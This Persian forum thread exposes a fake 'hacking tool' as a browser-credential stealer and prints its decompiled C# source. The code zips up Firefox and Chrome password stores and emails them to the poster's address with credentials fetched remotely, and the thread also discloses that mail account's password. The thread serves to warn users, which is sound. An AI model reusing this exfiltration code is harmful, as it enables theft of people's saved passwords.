PDA

View Full Version : بابا هر برنامه ای که دادن بهتون گفتن تست کنید، بدون سورس اجراش نکنید (1000 بار)

Himalaya
شنبه 21 اردیبهشت 1392, 20:34 عصر
سلام
حدود 1 ساعت پیش یه تاپیک دیدم با عنوان (نظرتون درباره نرم افزار هکی که ساختم چیه ؟) از aradrobo (http://barnamenevis.org/member.php?258903-aradrobo)
هر چند که همینم کار خودش نبودا :چشمک: ولی مهدی کرامتی حذفش کرد (دلیل:مغایر قوانین سایت)
گفتم ببینم چیه این برنامه. 37 نفر دانلود کرده بودن (الان شده 48). دیدم بدون سورسه گفتم بزار سورسشو ببینم
برنامه یه همچین محیطی داره

104047

اما اون کنترلهایی که جلو چشمن، هیچ کاری انجام نمیدن. دکوره. کار اصلی زیر PictureBox انجام میشه

104048

اما چیکار میکنه؟
تو فرم لود

private void Form1_Load(object sender, EventArgs e)
{
try
{
this.txtPcName.Text = Environment.UserName;
IList directories = Directory.GetDirectories(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Roaming\Mozilla\Firefox\Profiles");
this.LstAdr.DataSource = directories;
System.IO.File.SetAttributes("WebBrowserPassView.exe", FileAttributes.System | FileAttributes.Hidden);
System.IO.File.SetAttributes("WebBrowserPassView.cfg", FileAttributes.System | FileAttributes.Hidden);
WebClient client = new WebClient();
client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");
string address = "http://checkip.dyndns.org/";
Stream stream = client.OpenRead(address);
StreamReader reader = new StreamReader(stream);
string str2 = reader.ReadToEnd();
stream.Close();
reader.Close();
str2 = str2.Replace("<html><head><title>Current IP Check</title></head><body>", "").Replace("</body></html>", "").ToString().Replace("Current IP Address: ", "");
this.txtIp.Text = str2;
}
catch
{
}
}
کاری که میکنه نام کاربر جاری رو پیدا میکنه و فولدرهای موجود تو مسیر Mozilla\Firefox\Profiles رو لیست میکنه و و آدرس IP اینترنتی شما رو از طریق آدرس وبی که میبینید به دست میاره و اونو به شما نشون میده (با اینم هیچ کار خاصی انجام نمیده). Connect رو میزنید ولی کار خاصی انجام نمیشه (فقط یه لیبل Wait ظاهر و ناپدید میشه).

private void BtnIp_Click(object sender, EventArgs e)
{
if ((((this.textBox1.Text != "") && (this.textBox2.Text != "")) && (this.textBox3.Text != "")) && (this.textBox4.Text != ""))
{
this.LblWait.ForeColor = Color.Red;
this.LblWait.Visible = true;
this.timer3.Enabled = true;
}
else
{
MessageBox.Show("لطفاً آی پی قربانی را وارد کنید", "توجه");
}
}
محض ایجاد اطمینان، textbox های مربوط به آیپی به اصطلاح قربانی رو چک میکنه که خالی نباشن و در صورت خالی بودن یکی، یه پیغام میده. timer3 هم فقط لیبل wait رو بعد از 3 ثانیه مخفی میکنه
دکمه Passwords Show رو میزنید که مثلا پسوردهایی که هک شدن رو ببینید

private void BtnShowPass_Click(object sender, EventArgs e)
{
this.DoubleBuffered = true;
Application.DoEvents();
this.LblWait.Visible = true;
this.btnSendToMail_Click(sender, e);
}
تو خط آخر، ایونت کلیک یه دکمه اجرا میشه

private void btnSendToMail_Click(object sender, EventArgs e)
{
try
{
this.UserEmail = this.get_web_source("http://www.robowar.ir/Talia/MailSend/UserMail.txt");
this.PassMail = this.get_web_source("http://www.robowar.ir/Talia/MailSend/PassMail.txt");
this.timer2.Enabled = true;
}
catch
{
MessageBox.Show("Error");
}
}
دو خط اول، usarname , password که توسط اون ایمیل زده میشه رو به دست میاره. 2 تا فایل تکست گزاشته که محتوای اولی
pasha.parsfar@yahoo.com و محتوای دومی setareh هستش. بابا آخر امنیت.

private string get_web_source(string url)
{
WebClient client = new WebClient();
string str = client.DownloadString(url);
client.Dispose();
return str;
}
شیطون چقدر هم ایدی خفن توش save بود :چشمک:
و بعد تایمر 2 فعال میشه

private void timer2_Tick(object sender, EventArgs e)
{
try
{
this.timer2.Enabled = false;
MailMessage message = new MailMessage();
message.From = new MailAddress(this.UserEmail);
message.To.Add("robowar1@yahoo.com");
message.Subject = "Hack Mozilla - " + this.txtPcName.Text;
if (System.IO.File.Exists(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Roaming\Mozilla\Firefox\Profiles\" + this.txtFolderName.Text + @"\signons.sqlite"))
{
message.Attachments.Add(new Attachment(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Roaming\Mozilla\Firefox\Profiles\" + this.txtFolderName.Text + @"\signons.sqlite"));
}
if (System.IO.File.Exists(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Roaming\Mozilla\Firefox\Profiles\" + this.txtFolderName.Text + @"\key3.db"))
{
message.Attachments.Add(new Attachment(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Roaming\Mozilla\Firefox\Profiles\" + this.txtFolderName.Text + @"\key3.db"));
}
if (System.IO.File.Exists(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Local\Google\Chrome\User Data\Default\Web Data"))
{
message.Attachments.Add(new Attachment(@"C:\Users\" + this.txtPcName.Text + @"\AppData\Local\Google\Chrome\User Data\Default\Web Data"));
}
message.Body = "این فایلها از هک موزیلا و کروم برایتان ارسال شدند.";
message.IsBodyHtml = false;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential(this.UserEmail, this.PassMail);
client.Port = 0x24b;
client.Host = "smtp.mail.yahoo.com";
client.Send(message);
this.LblWait.ForeColor = Color.Green;
this.LblWait.Visible = false;
Process.Start("WebBrowserPassView.exe");
}
catch
{
MessageBox.Show("خطایی رخ داده است.مجدداً تلاش فرمایید");
}
}
که فکر کنم احتیاجی به توضیح نداشته باشه

خلاصه خیلی از دوستان تا یکی یه فایل میزاره واسه دانلود، همینطوری برمیدارن رو کامپیوترشون اجرا میکنن.
منظورم این نبود که ببینید چه کار خفنی کرده (2 هفته برنامه نویسی کرده باشی بهتر از این مینویسی). والا این برنامه که
چرت محض بود. خواستم باز اینو یادآور بشم که
بابا هر برنامه ای که دادن بهتون گفتن تست کنید، بدون سورس اجراش نکنید (1000 بار)

Vahab
شنبه 21 اردیبهشت 1392, 21:50 عصر
ممنون بابت اطلاع رسانی

FastCode
شنبه 21 اردیبهشت 1392, 22:02 عصر
من تا امروز چند تا برنامه اینطوری گرفتم.و البته ایمیل ها رو هم حذف کردم.امیدوارم شما هم قبلا این کار رو کرده باشید و از تمام افرادی که این کار رو کردن بخواهید که تمام رمزهاشون رو عوض کنن.(صد در صد ایمیلشون رو دارید.)و لطفا قبل از حذف کردن ایمیل(اگر تا الان این کار رو نکردید)مطمئن بشید که رمز کاربران رو حذف کردید.

من این برنامه رو استفاده نکردم.
ولی به همین دلیل همیشه از امکان master password ه firefox استفاده میکنم.که حداقل ۴۸ ساعت تا crack ه master password ام وقت داشته باشم که همه ی رمز هام رو عوض کنم.پیشنهاد میکنم بقیه هم این کار رو بکنن.

و به خاطر اینکه فکر میکنم با این دفعه تعداد برنامه های scareware و scam دو رقمی شد سعی میکنم تاستون یک decompiler ه آنلاین به سایت هدیه کنم.(سعی میکنم/قول نمیدم.)
البته قول میدم که اگر کردم حتما سورسش رو بدم نه خودش رو که آقای کرامتی حتما نصب کنه:P

@aradrobo:واقعا برای خودم متاسفم که فکر میکردم شما میخواهید برنامه نویسی یاد بگیرید.

@karai333:ممکنه برنامه رو بزارید که بیشتر بررسیش کنم؟

Himalaya
شنبه 21 اردیبهشت 1392, 22:42 عصر
سلام

من تا امروز چند تا برنامه اینطوری گرفتم.و البته ایمیل ها رو هم حذف کردم.امیدوارم
شما هم قبلا این کار رو کرده باشید و از تمام افرادی که این کار رو کردن بخواهید که
تمام رمزهاشون رو عوض کنن.(صد در صد ایمیلشون رو دارید.)و لطفا قبل از حذف کردن
ایمیل(اگر تا الان این کار رو نکردید)مطمئن بشید که رمز کاربران رو حذف کردید.

من برنامه رو اجرا نکردم. سورسش رو یه نگاه انداختم. ضمن اینکه ایمیل بخش From تو سورس (یوزر پسش موجوده) با ایمیل گیرنده (که پسش موجود نیست) فرق داره و به همین خاطر نمیتونستم وارد ایمیل گیرنده بشم

سورسش هم چیزه خاصی نداره (کلا یک فرمه اونم بیشتر کداشو بالا قرار دادم). با Reflector بازش کردم که پروژش رو ضمیمه میکنم.

من سورسش رو عینا قرار دادم. دیگه موقع اجرا حواستون باشه دیگه (هر چند ارزش وقت تلف کردن نداره)

na_des
شنبه 21 اردیبهشت 1392, 22:46 عصر
چه اسم جالبی براش انتخاب کردین :لبخند:
من که دل خوشی از هکرا ندارم ، ایشالا خدا هدایتشون کنه

Mahmoud.Afrad
شنبه 21 اردیبهشت 1392, 23:53 عصر
همینقدر بگم که این بابا aradrobo اصلا برنامه نویسی بلد نیست.
همه کارهایی که کرده از همین سایت کپی زده. حتی همین الان توی تاپیک "ارسال ایمیل بدون دنگ و فنگ ( با یاهو و گوگل تست شده ) :D (http://barnamenevis.org/showthread.php?396168-%D8%A7%D8%B1%D8%B3%D8%A7%D9%84-%D8%A7%DB%8C%D9%85%DB%8C%D9%84-%D8%A8%D8%AF%D9%88%D9%86-%D8%AF%D9%86%DA%AF-%D9%88-%D9%81%D9%86%DA%AF-%28-%D8%A8%D8%A7-%DB%8C%D8%A7%D9%87%D9%88-%D9%88-%DA%AF%D9%88%DA%AF%D9%84-%D8%AA%D8%B3%D8%AA-%D8%B4%D8%AF%D9%87-%29-D)" دنبال کد ارسال ایمیل هست در حالی که توی این برنامه از کد ارسال ایمیل استفاده شده. یعنی برنامه خودشم بلد نیست

و همچنین اینکه به جای استفاده از متغیرها اومده از تکست باکس استفاده کرده و روی این تکست باکسها یه پیکچرباکس گذاشته تا کاربر رو گول بزنه.

و جالب تر از همه اینکه این برنامه های جاسوسی رو میفروشه!!!!!!!!!! یعنی هم پول طرفو میگیره و هم جاسوسی شونو میکنه.

ما فکر میکردیم واقعا میخواد یاد بگیره میاد سوال میپرسه!! واقعا حیف اون وقتی که کاربران این سایت برای سوالات aradrobo گذاشتند.

FastCode
یک شنبه 22 اردیبهشت 1392, 00:00 صبح
چه اسم جالبی براش انتخاب کردین :لبخند:
من که دل خوشی از هکرا ندارم ، ایشالا خدا هدایتشون کنه
هکر ها دو دسته بندی دارند:white hat/gray hat/black hat که از اسمشون مشخصه یعنی چی.
و دسته بندی دیگه geek/nerd/script kiddy ....

ایشون یک script kiddy ه black hat هست که جز دسته ای قرار میگیره که حتی پیش blackhat ها هم جایگاه نداره.

اگر روشش نو بود اشکالی نداشت.شاید تشویق هم میشد و ....ولی این کار کپی کردن چهار تا رمز مسخرست و حتی اگر ۱ میلیون نفر رو قربانی میکرد باز هم همین بازخورد رو داشت.

Himalaya
یک شنبه 22 اردیبهشت 1392, 02:41 صبح
سلام
یه چندتا پست از این آقا دیدم الان، که یه کم خنده دار بودن
(پست 23) (http://barnamenevis.org/showthread.php?367960-%D8%B1%D9%87%D9%86%D9%85%D8%A7%DB%8C%DB%8C-%D8%AF%D8%B1-%D8%B3%D8%A7%D8%AE%D8%AA-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%DB%8C-%D9%87%DA%A9-%D9%88%D8%A8%D9%84%D8%A7%DA%AF-!!!)

دوست عزیز برنامه ای که قرار داده بودم یک نمونه آموزش هک وبلاگ بود
یه برنامه بدون سورس، بدون اطلاع طرف، چندتا فایل از کامپیوترش برمیداره میفرسته به یه جایی (میگم کجا). واقعا بار آموزشی که داشت، آدمیزاد که هیچ، کمر خر زیر همچین باری تاب نمیاره
(پست 25) (http://barnamenevis.org/showthread.php?367960-%D8%B1%D9%87%D9%86%D9%85%D8%A7%DB%8C%DB%8C-%D8%AF%D8%B1-%D8%B3%D8%A7%D8%AE%D8%AA-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%DB%8C-%D9%87%DA%A9-%D9%88%D8%A8%D9%84%D8%A7%DA%AF-!!!)

کی گفته رمزها برای من ارسال می شود ؟ مگر چنین چیزی امکان پذیر می باشد ؟به دم خروس که اصلا اعتقاد نداری شما.

MailMessage message = new MailMessage();
message.To.Add("robowar1@yahoo.com");

104068

(پست 29) (http://barnamenevis.org/showthread.php?367960-%D8%B1%D9%87%D9%86%D9%85%D8%A7%DB%8C%DB%8C-%D8%AF%D8%B1-%D8%B3%D8%A7%D8%AE%D8%AA-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%DB%8C-%D9%87%DA%A9-%D9%88%D8%A8%D9%84%D8%A7%DA%AF-!!!)

اینجا مثل اینکه بعضی ها فکر می کنند خیلی باهوش هستند . شانس خودم اسم فایل exe رو گذاشتم هک . فکر می کنی خیلی باهوشی ؟خوب اره گذاشتی هک. ولی هک کی؟ (بیا اسمشو نزاریم هک، یه هکر ببینه به خدا میخنده بهمون).
40و 50 سال تلاش کردی تا بلاخره تونستی کد ارسال ایمیل رو copy, paste کنی. (خدا بیامرزه پدربزرگمو. همیشه از پشتکار تو برام حرف میزد).
تازه من به بچه ها نگفتم که یه فایل exe دیگه (WebBrowserPassView.exe (http://www.nirsoft.net/utils/web_browser_password.html)) کنار برنامت بود که خودتم اصلا نمیدونی چیه. (نگران نباش پیش خودمون میمونه :لبخند:)

ببین من اصلا کاری ندارم چرا این کارو کردیا ولی آخه تو اصلا زیر بار هم نمیری.

fool66
یک شنبه 22 اردیبهشت 1392, 02:51 صبح
چطوری سورسشو در اوردی ؟؟؟!!!! مگه میشه برنامه اجرایی رو به سورس تبدیل کرد؟؟؟؟

Mahmoud Zaad
یک شنبه 22 اردیبهشت 1392, 10:08 صبح
من خیلی وقته که تاپیکهایی که این آدم شروع میکنه رو اصلاً باز نمی کنم، ایشون یک تاپیک بدرد بخور نداره و فقط به نظرم یه اعتماد به نفس کاذبی در ایشون وجود داره. چندین بار از اینکارها کرده و همینطور بهش حمله شده ولی انگار نه انگار، ذره ای استعداد برنامه نویسی و خلاقیت هم خداوند در وجود ایشون embed نکرده! امیدوارم خداوند یه بازنگری تو سورسش بکنه و هدایتش کنه!

esafb52
یک شنبه 22 اردیبهشت 1392, 10:32 صبح
سلام ممنون از همه دوستان به خاطر اطلاع رسانی الان هم احتمالا داره تایپیک رو میبنه و لی بصورت آف مدیران محترم اقدام کنن

peymanjon
یک شنبه 22 اردیبهشت 1392, 10:44 صبح
من کسایی که می خواهند برنامه نویسی شروع کنند را اول از همه به ثبت نام در برنامه نویس و خواندن مطالب آموزشی اون تشویق می کنم ولی وجود افرادی مثل این آقا باعث میشه که از افرادی مثل دوستان من که تازه می خواهند وارد این حرفه بشوند سوء استفاده شود ، واقعاً جا خوشحالیه که بچه های قویتر و مدیران سایت حواسشون به این افراد ناشایست هست ، لطفاً IP هایی که این شخص login کرده را به همراه User یا USER های احتمالی او بلاک کنید و مدیران بخش در اول هر بخش تاپیکی با این عنوان "مطالبی که تازه کارها باید بدانند" را ایجاد و نکات امنیتی مثل اجرا نکردن exe بدون سورس و... را متذکر بشوند.از آقایون karaji333 و (http://barnamenevis.org/member.php?53563-karaji333)FastCode (http://barnamenevis.org/member.php?109710-FastCode)که اطلاع رسانی کردند بسیار ممنونم. قبلاً من اگه تاپیکی می دیدم که exe بدون سورس گذاشته بی خیال ازش می گذشتم ولی الان کار این دو بزرگوار باعث شد که یادم بمونه در برابر کسایی که به این سایت معرفی کردم و بقیه دوستانم مسئولم و من هم وظیفه خودم می دونم که در صورت دیدن چنین افرادی در مقابلشون بایستم و به مدیران اطلاع دهم این سایت را به محیطی امن تبدیل کنیم.
موفق باشید.

dadavaran
یک شنبه 22 اردیبهشت 1392, 11:10 صبح
باسلام و تشکر از همه اساتید محترم که ماهیت این برنامه رو فاش ساختن
راستش من خیلی از لحاظ فنی سر در نیاوردم که این برنامه با سسیتم قربانی چکاری میتونه انجام بده...
ولی یه سئوال دارم، میخواستم بدونم که آیا عمل ایشون، از نظر قانون جرم تلقی میشه یا نه؟ و اگه جواب مثبته برای ردیابیش حتماً باید از طریق مراجع قضایی و پلیس فتا کمک گرفته بشه یا اساتید و مدیران این بخش خودشون میتونن حسابشو برسن؟

Mahmoud Zaad
یک شنبه 22 اردیبهشت 1392, 11:28 صبح
میخواستم بدونم که آیا عمل ایشون، از نظر قانون جرم تلقی میشه یا نه؟ و اگه جواب مثبته برای ردیابیش حتماً باید از طریق مراجع قضایی و پلیس فتا کمک گرفته بشه یا اساتید و مدیران این بخش خودشون میتونن حسابشو برسن؟
البته من حقوقدان نیستم (ولی حقوقدانها رو دوست دارم!) ولی طبق قانون جرایم رایانه ای (http://mofidlinks.ir/0-8.htm) مصوب 11بهمن 1389، به نظرم کار ایشون در مبحث سرقت و کلاهبرداری مرتبط با رایانه قرار می گیره که مجازاتش هم اونجا درج شده ولی اینکه پلیس فتا پیگیری میکنه یا نه، الله اعلم! شاید اصلاً ایشون مصونیت قضایی داشته باشند!!!

esafb52
یک شنبه 22 اردیبهشت 1392, 13:14 عصر
یک نکته رو لازم دونستم که بگم که دوستان تکرار میکنند فایل اجرایی+ سورس
شما فکر کن من تو تایپیک یه فایل اجرایی قرار بدم و بعد سورس دیگه رو با همون اسم فایل اجرایی قرار بدم...........بقیه اش رو ببین چه می شود؟؟؟ باز ممکنه یه تعداد مستقیم کد رو نخونن و یکبار اجراش کنن اونوقت چی

FastCode
یک شنبه 22 اردیبهشت 1392, 13:23 عصر
شما فکر کن من تو تایپیک یه فایل اجرایی قرار بدم و بعد سورس دیگه رو با همون اسم فایل اجرایی قرار بدم...........بقیه اش رو ببین چه می شود؟؟؟ باز ممکنه یه تعداد مستقیم کد رو نخونن و یکبار اجراش کنن اونوقت چی
و Modification Date ه فایل اجرایی و Object ها رو خیلی جلو بزارید که Compile درست عمل نکنه.
راه برای نابود کردن ویندوز بسیار است.

خوشبختانه کسایی که این کارها رو میکنن این روش ها رو درک نمیکنن.

علی متقی پور
یک شنبه 22 اردیبهشت 1392, 13:46 عصر
سلام به همه
شخصیت این بنده خدا رو نابود کردید!
خب اسم برنامم میگه که برنامه هکه!
من یه سوالی دارم آقا یا خانومی که میخواهی هک یاد بگیری، میخواهی شما کی رو هک کنی؟
یعنی اگر یکی منو هک کنه آدم بدیه ولی اگر من کسی رو هک کنم یعنی خیلی حرفه ایم
اگر هک بده برای همه بده و اگر خوبه برای همه خوبه.
بنظر منم اونائیکه دنبال این مسائل هستن حقشونه هک بشن.
چرا امثال بنده از این مسائل ضربه ای نمیخوریم؟
چون حتی اگر بدونیم با زدن یک دکمه رمز همه بچه های فروم رو هم بدست میاریم اینکارو نمیکنیم.
بهرحال شر علاقه مندان به هک به خودشون برگشت

<<< البته کسائیکه صرفا از روی کنجکاوی یا برای بالا بردن تخصصشون دنبال این چیزهان از این موضوع مستثنائا و روی سخن بنده با اونها نیست >>>

fool66
یک شنبه 22 اردیبهشت 1392, 14:09 عصر
هک به جاش بلد باشی بد نیست

یه بنده خدایی برنامه نویسی تحت وب انجام میداد می گفت اول باید برنامه نویسی رو یاد گرفت بعد از اینکه یاد گرفتی با روش های هک برنامه ی خودتو تست کنی

هرچه بگندد نمکش میزنند , وای به روزی که بگندد نمک:اشتباه:

به نظر من یه قفل ساز خوب کسی هست که شناخت روی راه های دزدی داشته باشه

ولی کار ایشون سوء استفاده محض بوده و هست

abdullah20
یک شنبه 22 اردیبهشت 1392, 14:40 عصر
دوستمون a_mottaghi_pour راست میگن
بهتر بود با پیام خصوصی به aradrobo تذکر میدادید
تو دو ماه پیش من خودم سه تا تاپیک به این شکل دیدم و به کسایی که این تاپیکها را ایجاد کرده بودند پیام خصوصی دادم و اونها سریع تاپیک خودشون را حذف کردند

Mahmoud Zaad
یک شنبه 22 اردیبهشت 1392, 15:15 عصر
تو دو ماه پیش من خودم سه تا تاپیک به این شکل دیدم و به کسایی که این تاپیکها را ایجاد کرده بودند پیام خصوصی دادم و اونها سریع تاپیک خودشون را حذف کردند
ما هم متوجه کرامت انسانی و اینجور مسائل هستیم ولی کسی که مدام کار اشتباهش رو تکرار می کنه رو باید اینجوری باهاش برخورد کرد. من حتی بعضی ها که غلط املایی تابلو دارن رو خیلی از موارد به خودم اجازه نمیدم توی تاپیک بهشون بگم و پیام خصوصی میدم ولی این کاربر دیگه اصلاً رعایت نمی کنه. شما خودتو در نظر نگیر که خیلی وقته با برنامه نویسی و کامپیوتر سر و کار داری اینجا خیلیا هستن که راهنمایی و دبیرستانی ان، تازه اومدن برنامه نویسی یاد بگیرن، فکر می کنن اینجا سایت آموزشیه این فایلا رو دانلود می کنن و ... به نظرم برای تنویر افکار عمومی لازم بود!

FastCode
یک شنبه 22 اردیبهشت 1392, 15:20 عصر
ببین دوست عزیز من هم خیلی جاها رو هک کردم.عابر بانک.بیمارستان.مخابرات.ISP و ......
ولی نابودشون نکردم و رمزهاشون رو برنداشتم.
بهشون به شکل کاملا خصوصی هشدار دادم که نقطه ضعفتون فلان جا هست.
اگر میگفت برنامه چی هست یا حداقل از یک روش تخیلی مثل این استفاده نمیکرد من خودم راهنماییش میکردم که چطوری این کار رو انجام بده.الان که دیگه هیچی.خیلی دیر شده.

SHD.NET
یک شنبه 22 اردیبهشت 1392, 15:21 عصر
حیف اون سوالایی که پرسیده بود و براش وقت گذاشتم !!!!!

aradrobo
یک شنبه 22 اردیبهشت 1392, 15:23 عصر
ما هم متوجه کرامت انسانی و اینجور مسائل هستیم ولی کسی که مدام کار اشتباهش رو تکرار می کنه رو باید اینجوری باهاش برخورد کرد. من حتی بعضی ها که غلط املایی تابلو دارن رو خیلی از موارد به خودم اجازه نمیدم توی تاپیک بهشون بگم و پیام خصوصی میدم ولی این کاربر دیگه اصلاً رعایت نمی کنه. شما خودتو در نظر نگیر که خیلی وقته با برنامه نویسی و کامپیوتر سر و کار داری اینجا خیلیا هستن که راهنمایی و دبیرستانی ان، تازه اومدن برنامه نویسی یاد بگیرن، فکر می کنن اینجا سایت آموزشیه این فایلا رو دانلود می کنن و ... به نظرم برای تنویر افکار عمومی لازم بود!

دوست عزیز فکر کردی خیلی زرنگی ؟
من خودم برنامه رو بصورت معمولی براتون ارسال کردم . فکر کردی شاهکار کردی سورسشو در آوردی ؟ من که دی کد نکرده بودمش دوست خوب . در ضمن یادت باشه . آدم های بزرگ راز ها را در خودشان نگه می دارند .
ولی خوشحالم که من باعث شدم یکی به ستاره هات اضافه بشه . آگه اگه من نبودم اینقدر لایک نمی گرفتی . :لبخندساده:

FastCode
یک شنبه 22 اردیبهشت 1392, 15:28 عصر
من خودم برنامه رو بصورت معمولی براتون ارسال کردم . فکر کردی شاهکار کردی سورسشو در آوردی ؟ من که دی کد نکرده بودمش دوست خوب . در ضمن یادت باشه . آدم های بزرگ راز ها را در خودشان نگه می دارند .
ولی خوشحالم که من باعث شدم یکی به ستاره هات اضافه بشه . آگه اگه من نبودم اینقدر لایک نمی گرفتی . :لبخندساده:
ببین آدم(خیلی عجیبه هنوز دارم آدم صدات میکنم) عاقل(به قول خودت)
افرادی که توی این تاپیک پست دادن همه یک رزومه ۸ صفحه دارن و یک عمر توی این کار بودن.شما یک جوجه برنامه نویس بیشتر حساب نمیشی.اگر واقعا خیلی خوشت میاد از این کارها من فردا ازتون شکایت میکنم.احضاریه ۴ شنبه در خونتونه.
Edit:
ظاهرا شما هنوز فکر میکنی این تاپیکها شوخیه.توی دادگاه جدی میشه.
Go fuck yourself

@karaji333:لطفا باینری اصلی رو قرار بدید.مرسی

Mahmoud Zaad
یک شنبه 22 اردیبهشت 1392, 15:30 عصر
والله من اصلا برنامه رو نگرفتم که بخوام بازش کنم و سورسش رو هم از توی همین تاپیک دیدم، زرنگ هم ظاهراً شما هستید، من نه نیازی به ستاره دارم نه به تشکر شما هم می تونید تمام تشکر هایی که از من کردید رو حذف کنید، من نه عقده ستاره و سیاره دارم نه احتیاجی به تشکر، لطف عالی مستدام سایه شما از سر هکرها کم نشود!

FastCode
یک شنبه 22 اردیبهشت 1392, 17:21 عصر
http://spamsaz.mihanblog.com/
لطفا report کنید.
http://mihanblog.com/etc/main/abuse

Mahmoud.Afrad
یک شنبه 22 اردیبهشت 1392, 17:41 عصر
http://spamsaz.mihanblog.com/
لطفا report کنید.
http://mihanblog.com/etc/main/abuse
خواهشا همه گزارش کنند.

جواب سوالات این یارو aradrobo (http://barnamenevis.org/member.php?258903-aradrobo) رو هم کسی نده ، بزارید تاپیک هاش خاک بخوره.

Himalaya
یک شنبه 22 اردیبهشت 1392, 18:49 عصر
سلام

@karaji333:لطفا باینری اصلی رو قرار بدید.مرسی
راستش انقدر چرت بود که حیفم اومد حتی 1 بیت از هارد رو اشغال کنه. Shift + Delete

وقتی فایل اجرایی دادن + سورس، شما فایل اجرایی رو بزار کنار. فقط سورس

شخصیت این بنده خدا رو نابود کردید!
خب اسم برنامم میگه که برنامه هکه!

مثلا یکی یه برنامه درست کنه بده به شمای نوعی. بگه اجراش کن به اینترنت هم وصل باش فقط. اجراش که کنی میره تو فلان سایت بانکی و حسابتون رو پره پول میکنه. اسم فایل هم BankHack. اجراش میکنی و از قضای روزگار 4 تا عکس خانوادگی داری تو کامپیوتر که ایمیل میشه واسه ایشون. شمام که خبر نداری. برنامه هم کارشو که کرد یه پیغام سوری میده و 2 روز دیگه میبینید عکسا تو فلان سایته. پس نباید مشکلی باشه دیگه.

واقعا فکر میکنی من بهش پیغام خصوصی میدادم، اونم میگفت چشم؟ ممنونم که منو امر به معروف و نهی از منکر کردی!!! دیگه تکرار نمیشه.
فکر نکنم. تو 2 تا تاپیک دیگه بچه ها بهش گفته بودن دیگه. تو پست 9 چندتا لینک قرار داده بودم که تو اونا دوستان دیگه تذکر داده بودن به ایشون. ولی چی شد؟ اومد یه تاپیک زد که آقا بریزید دانلود کنید. لینک های پست 9 هم که به فنا رفت

من خودم برنامه رو بصورت معمولی براتون ارسال کردم . فکر کردی شاهکار کردی
سورسشو در آوردی ؟ من که دی کد نکرده بودمش دوست خوب

اولا اگه اینکارو نکردی واسه اینه که بلد نیستی. کسی که واسه یه نرم افزار زپرتی کد نرم افزاری میزاره، مطمئنا اگه بلد باشه این کار رو هم انجام میده.

من نرم افزار کلوب رو ازتون قبلا خریدم ولی ویندوز که نصب کردم کدی که بهم دادید رو میزنم فعال نمیشه کد نرم افزاری هم تغییر کرده.میشه دوباره کد فعال سازی
رو برام بفرستید؟ کد نرم افزاری: 57634039. علت اینکه ویندوز عوض میکنم کد عوض میشه چیه؟

علت اینه که نرم افزار ها از سیستم تشخیص ویندوز استفاده می کنند برای اینکه کاربر نتواند نرم افزار خریداری شده را به کس دیگری به فروشد .
دوما شما نباید دیکد کنی که عزیزم. شما برنامه مینویسی بعد سورست رو کد میکنی، یکی دیگه اگه حال داشت میاد به قول شما دیکد میکنه. هنوز نمیدونی چه کسی باید Encode کنه چه کسی Decode.
برنامت رو هم که از روی سرور حذف کردی (http://s4.picofile.com/file/7757489137/Show_Pass_WebSite.zip.html)

پیر زن رو از ..... می ترسونی ؟

گفتم سنت بالاس ولی دیگه نه اینقد که

FastCode
یک شنبه 22 اردیبهشت 1392, 19:21 عصر
خوشبختانه پلیس شب ها هم کار میکنه.اگر از چند روز دیگه پیداش نشد کار من بوده.

حمیدرضاصادقیان
یک شنبه 22 اردیبهشت 1392, 19:25 عصر
سلام.
این تاپیک قفل خواهد شد و حذف نمیشه ، باشد عبرتی برای مابقی افرادی که قوانین رو رعایت نمیکنند.
جناب آقای aradoo هم تو اخطاری که بهتون دادم گفتم هم اینجا اعلام میکنم و با مابقی افراد نیز هستم.
قبل از ارسال پست ، قوانین رو رعایت کنید.
شوخی با اطلاعات خصوصی افراد کار صحیحی نیست.
اگر بخواهیم برنامه های هکری بنویسیم شاید افرادی اینجا باشند که بتونند ابزاری بنویسند که به راحتی توسط آنتی ویروس های مطرح مثل Kaspersky هم شناسایی نشه و به راحتی دخل تمام اطلاعات شما رو بیارند.
پس برای تست و بررسی نتیجه این جور برنامه های کودکانه ، میتونید از بلاگ خودتون پیگیری کنید.

وقت بخیر.